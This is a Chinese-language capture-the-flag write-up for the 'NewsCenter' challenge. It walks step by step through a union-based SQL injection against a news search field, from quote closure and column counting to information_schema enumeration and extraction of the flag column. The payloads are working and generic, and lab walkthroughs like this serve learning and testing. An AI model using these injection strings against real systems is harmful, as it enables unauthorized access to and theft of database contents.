攻防世界【NewsCenter】解题方法
-
简单分析
通过主页面可知,这是一个根据关键字搜索新闻的页面
-
测试是否存在SQL注入
用单引号闭合发现报错hello'
将单引号注释掉后恢复正常
hello'#
输入 ’ 后使得sql语句中多了一个单引号造成错误,而注释掉后面内容后又恢复正常,说明输入的单引号与前面的id=1也形成了一个闭合,因此可以判断注入类型为字符型,闭合方式为单引号
-
判断select查询返回的列数
使用order by字段测试,order by 3不报错,order by 4报错,说明列数为3hello order by 4#
-
判断页面回显的数据是第几列
hello' union select 1,2,3 #
假设搜索的结果为空,union select 1,2,3会回显相应的1,2,3,如果不为空,会回显第一条数据,假设只有一条数据满足,则可以用limit过滤(limit 1,1显示第二行数据)
hello' union select 1,2,3 limit 1,1 #
根据回显结果可以看出会显示第二、三列的数据 -
获取数据库名
hello' union select 1,database(),3#
可知数据库名为news -
获取表名
从系统数据库information_schema的TABLES表中根据数据库名news获取数据库名hello' union SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM information_schema.TABLES WHERE TABLE_SCHEMA='news'#
结果如下,可知flag在sercet_table表中
-
获取列名
在COLUMNS表中根据数据库名、表名获取列名hello' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='news' AND TABLE_NAME='secret_table'#
可知列名为fl4g中存放着flag
-
获取flag
hello' UNION SELECT 1,GROUP_CONCAT(fl4g),3 FROM news.secret_table#